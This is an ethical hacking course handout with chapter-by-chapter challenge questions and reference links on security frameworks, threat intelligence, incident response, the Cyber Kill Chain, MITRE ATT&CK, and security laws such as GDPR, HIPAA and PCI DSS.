Ethical Hacking: Introduction to Ethical Hacking

with Lisa Bock

Challenges and hyperlinks for each chapter

Note: Links may change or be unavailable over time.

Chapter 1. Protect Data in a Digital World

01_01. Recognizing elements of information security
Challenge Question
Q. Review the importance of ensuring data confidentiality, integrity, and availability.

01_02. Providing information assurance

• Data breaches and cyberattacks will most likely continue. More and more data is being
generated every day, as shown here: https://www.statista.com/statistics/273550/data-
breaches-recorded-in-the-united-states-by-number-of-breaches-and-records-exposed/.
• Just what’s at risk? Let’s take a look at a mind map for internet infrastructure assets found
at the European Union Agency for Cybersecurity:
https://www.enisa.europa.eu/topics/cyber-threats/threats-and-trends/enisa-thematic-
landscapes/threat-landscape-of-the-internet-infrastructure. Once there, select and open
the link “Detailed Mind Map for Internet Infrastructure Assets,” which will show all potential
vulnerable targets in an infrastructure.
Challenge Question
Q. Explain why ethical hacking helps provide “due care” in defending an infrastructure’s
security posture.

01_03. Defending in depth

• Every day more and more services are being added to the network, making security a
constant challenge. Visit https://cybermap.kaspersky.com/ to see many active attacks
around the world.
Challenge Question
Q. A layered approach at multiple locations can help repel all classes of attacks. Summarize
how a layered approach uses three basic elements: technical, administrative, and the people.

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 1 of 9

01_04. Using AI and ML in cybersecurity
Challenge Question
Q. Artificial intelligence (AI) and machine learning (ML) are two powerful allies in cybersecurity.
Explain some of the ways AI and ML can help prevent cyberattacks.

01_05. Adapting to the threats

• Learn more about NIST Cybersecurity Framework’s five functions (Identify, Protect, Detect,
Respond, and Recover) by visiting:
https://www.nist.gov/cyberframework/online-learning/five-functions.
Challenge Question
Q. A continual/adaptive security strategy provides a proactive approach to securing the data.
Discuss various methods of continually monitoring network activity.

01_06. Leveraging event correlation

Challenge Question
Q. Event correlation analyzes multiple events to identify relationships, patterns, and
correlations among events. Discuss how event correlation along with next-generation detection can
stopthreats on the network.

Chapter 2. Maintain a Vigilant Posture

02_01. Modeling threats

• To see an example of a Threat Modeling Tool, visit:

https://www.visual-paradigm.com/features/threat-modeling-tool/.
• Visit https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool
to download Microsoft’s Threat Modeling Tool.
• To learn more about tactical threat modeling, download the following:
https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf.
Challenge Question
Q. Outline how threat modeling helps to visualize vulnerabilities within entry points so they
can be mitigated before resulting in an attack.

02_02. Monitoring using cyberthreat intelligence

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 2 of 9

 • Visit https://www.sans.org/, where you can find training and other resources.
• Many sources feed into intelligence, such as the Common Vulnerabilities and Exposures
(CVE): https://www.cve.org/. The CVE is a database of vulnerabilities that uses a standardized
naming schema to facilitate the sharing of threat intelligence.
• Visit CISA.gov at https://www.cisa.gov/ais to learn about the automated indicator sharing
program that allows the US federal government and private sector to share threat indicators.
• Cyberthreat intelligence standards such as STIX and TAXII facilitate the exchange of threat
information by specifying data structures and communication protocols. Learn more here:
https://www.anomali.com/resources/what-are-stix-taxii.
• Cisco Talos provides threat intelligence. Learn more here: https://talosintelligence.com/.
Challenge Question
Q. Cyberthreat intelligence leverages past events in order to block and remediate potential
attacks. Outline the power of cyberthreat intelligence in maintaining a vigilant posture.

02_03. Following the threat intelligence lifecycle

• To read more about the Cyber Threat Intelligence Lifecycle, visit:

https://flare.io/learn/resources/blog/threat-intelligence-lifecycle/.
• For an in-depth article on threat sharing, visit:
https://www.concordia-h2020.eu/blog-post/threat-intelligence-sharing/.
Challenge Question
Q. One method to defend against threats is by studying threat activity. Discuss the main
phases in the Cyber Threat Intelligence Lifecycle.

02_04. Managing incidents

• Malware can spread rapidly as we see in this WannaCry animation:

https://www.nytimes.com/interactive/2017/05/12/world/europe/wannacry-
ransomware-map.html.
Challenge Question
Q. It’s critical to move quickly in case of an incident, as this can lead to a disaster. List the
steps to take after an incident.

02_05. Challenge/solution: Hardening guide

In this challenge, we’ll review mitigation strategies to protect network assets and reduce the risk of

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 3 of 9

successful cyberattacks.

Go to https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-
and-their-customers and scroll down to “General Mitigation and Hardening Guidance for Small- and
Mid-Sized Business MSP Customers” and list the six key guidelines that will help protect network
assets and reduce the risk of successful cyberattacks.

Chapter 3. Summarize Hacking Frameworks

03_01. Understanding the Cyber Kill Chain

• Learn more about the Cyber Kill Chain and the meaning of advanced persistent threat by
visiting: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html#.
Challenge Question
Q. Discuss the Cyber Kill Chain along with the tactics, techniques, and procedures (TTPs) used
by the malicious actor during each phase.

03_02. Utilizing MITRE ATT&CK

• Learn more about the MITRE ATT&CK framework, found at https://attack.mitre.org/.

Scroll down to see columns in the matrix that describe some task that your team would
complete during the ethical hacking exercise.
Challenge Question
Q. The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework
provides tools and techniques specific to the ethical hacking process. Review some of the
elements in MITRE ATT&CK.

03_03. Analyzing using the Diamond Model

• To read more about the Diamond Model, go to

https://apps.dtic.mil/sti/citations/ADA586960.
Challenge Question
Q. Step through the process of an intrusion event using the Diamond Model.

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 4 of 9

03_04.Identifying adversary behavior

Challenge Question
Q. Malicious actors use several techniques to infiltrate a network. Compare the following
adversary behaviors: CLI execution, DNS tunneling, and lateral movement.

03_05. Discovering indicators of compromise

• Visit https://help.redcanary.com/hc/en-us/articles/360047863574-How-Red-Canary-works
to see an example of an alert that could indicate an IoC.
• To follow along with my demonstration, go to https://www.malware-traffic-analysis.net/
2020/12/07/index.html and download this file: 2020-12-07-Qakbot-with-Cobalt-Strike-and-
spambot-activity.pcap.zip.
• For another example of a dashboard on PacketTotal that breaks down what exactly was
going on in the file, go to: https://www.packettotal.com/app/analysis?id=6c844d-
0870f6325ac4c04dd7f90b9ded&name=signature_alerts.
• Once in Wireshark. use this filter: dns.qry.name == “smtp-relay.gmail.com”. This shows
a large number of DNS requests for a variety of mail servers, which helps confirm an
active instance of a spambot. In addition, use the smtp.data.fragment filter to show
some spam emails.
Challenge Question
Q. Indicators of compromise (IoCs) represents evidence that a cyberthreat may have
infiltrated a system. Review some categories of IoCs.

03_06. Challenge/solution: The Cyber Kill Chain

In this three-part challenge, we’ll review the Cyber Kill Chain and a case study that steps through
an attack, from cyberattack to data breach. We’ll finish with a review of mitigation strategies to
protect network assets and reduce the risk of successful cyberattacks.

1. Go to https://ibrahimakkdag.medium.com/applied-explanation-of-the-cyber-kill-chain-
model-as-a-cyber-attack-methodology-a5f666000820. List the main steps.
2. Go to Lockheed Martin at https://www.lockheedmartin.com/en-us/capabilities/cyber/
cyber-kill-chain.html#. Scroll down and provide an expanded definition of an advanced
persistent threat (APT).
3. Download the case study at https://www.researchgate.net/publication/335024682_A_

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 5 of 9

 Cyber-Kill-Chain_based_taxonomy_of_crypto-ransomware_features/link/5fbff79e4585
15b797734e9d/download, which is a forensic exercise where they piece together the
activities that led to this type of attack. Go to page 5 and list the six phases of this attack.

Chapter 4. Review Security Laws and Standards

04_01. Managing risks

Challenge Question
Q. Risk is a function of a threat exploiting a vulnerability. Explain the relationship between
risk, threats, and vulnerabilities.

04_02. Inventorying assets

• Maintaining an asset inventory of all covered PCI assets is mandatory for PCI DSS
requirement 2.4, as outlined in this article: https://www.pcidssguide.com/what-is-
inventory-and-asset-management-for-pci-compliance/.
• For a quick guide on PCI DSS standards, visit:
https://www.pcisecuritystandards.org/pdfs/pci_ssc_quick_guide.pdf.
• During a risk analysis exercise, the team will need to inventory all assets, and then
assign a business value based on how critical they are to business operations. Visit
https://www.cisecurity.org/white-papers/cis-hardware-and-software-asset-tracking-
spreadsheet/, where you can download a free template to evaluate all assets and
record how they are protected.
Challenge Question
Q. An organization has multiple assets that can be at risk of a cyberattack. Describe the
different types of assets, along with ways to conduct an inventory.

04_03. Defining information security standards

• FISMA (Federal Information Security Modernization Act) is a set of security standards for
US government systems and contractors. Learn more here:
https://csrc.nist.gov/projects/risk-management/fisma-background.
• ISO/IEC 27001 is a framework that specifies the requirements for establishing,
implementing, maintaining, and continually improving an organization’s information
security management system. Visit https://www.iso27001security.com/html/27001.html
for more information.

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 6 of 9

 • Visit https://www.iso27001security.com/html/toolkit.html, where you can find a toolkit
for ISO/IEC 27001.
Challenge Question
Q. An organization must incorporate safeguards into the security compliance plan to
defend against attacks. Outline the main elements of FISMA along with ISO/IEC 27001.

04_04. Outlining US regulations

• US lawmakers created the Sarbanes-Oxley Act of 2002 (SOX) in response to several

corporate accounting scandals that occurred between the years 2000–2002. Learn more
here: https://envoice.eu/en/blog/the-10-worst-accounting-scandals-in-us-history/.
Challenge Question
Q. The US has several standards that outline good practice when dealing with consumer data.
Describe the main elements of Sarbanes-Oxley Act (SOX), Health Insurance Portability and
Accountability Act (HIPAA), and the Digital Millennium Copyright Act (DMCA).

04_05. Exploring global cyber laws and standards

• The General Data Protection Regulation (GDPR) clearly outlines that consumer data must
be protected. Within the document, found at https://gdpr.eu/, you will find a checklist that
outlines the requirements for regularly testing the strength of the infrastructure for
vulnerabilities, with the goal of preventing a data breach.
Challenge Question
Q. Unlike US-based data protection regulations, several laws have a universal reach. Discuss
global cyber laws, including PCI DSS, GDPR, and the Data Protection Act 2018.

04_06. Challenge/solution: Cyberthreat information sharing

In this challenge, we’ll review key elements of NIST Special Publication 800-150, Guide to Cyber
Threat Information Sharing. Visit https://csrc.nist.gov/publications/detail/sp/800-150/final and
select local download.

Once open, go to section:

• 2.1 Threat Information Types, and list and define the five main types of threat information.
• 2.2 Benefits of Information Sharing and list the four main benefits of information sharing.
To see an example of a cybersecurity advisory, visit: https://www.nsa.gov/Press-Room/Press-
Releases-Statements/Press-Release-View/Article/3389044/us-agencies-and-allies-partner-to-

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 7 of 9

identify-russian-snake-malware-infrastructure/.

Chapter 5. Support Ethical Hacking

05_01. Comparing attack types and motives

• Today, we face a variety of passive and active attacks, as we see in this live threat map:
https://livethreatmap.radware.com/.
Challenge Question
Q. Today, we face a variety of attacks. Compare the different types of attacks, along with
outlining some of the motives and objectives of cybercrime.

05_02. Outlining the types of hackers

• Where is the dark web? If we look at this diagram, we can compare the surface web,
deep web, and dark web: https://sopa.tulane.edu/sites/default/files/2105-TulaneSoPA-
CustomBlogGraphics-KG-B-02.jpg.
• Here we see an example of the Tor flow https://torflow.uncharted.software, where
threat actors can communicate with one another in an anonymous manner.
Challenge Question
Q. Not all hackers are the same. Compare the different types of hackers, such as unauthorized,
authorized, and semi-authorized hackers, along with subcategories of semi-authorized and
unauthorized hackers.

05_03. Recognizing the skills of an ethical hacker

Challenge Question
Q. In order to be exceptional at ethical hacking, the individual must have a wide range of
hard and soft skills. List some of the skills of an ethical hacker and outline the scope and
limitations of ethical hacking.

05_04. Stepping through the hacking phases

Challenge Question
Q. An ethical hacking exercise goes through five stages. Review the main hacking phases:
reconnaissance, scanning, gaining access, maintaining access, and covering tracks.

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 8 of 9

05_05. Grasping the importance of ethical hacking

Challenge Question
Q. Ethical hacking evaluates a system to identify vulnerabilities that could be exploited by
malicious actors. Describe the importance of ethical hacking in testing a network’s defenses.

Conclusion
06_01. Next steps

• To see a list of courses on my home page, visit:

https://www.linkedin.com/learning/instructors/lisa-bock?u=2125562.

Ethical Hacking: Introduction to Ethical Hacking with Lisa Bock 9 of 9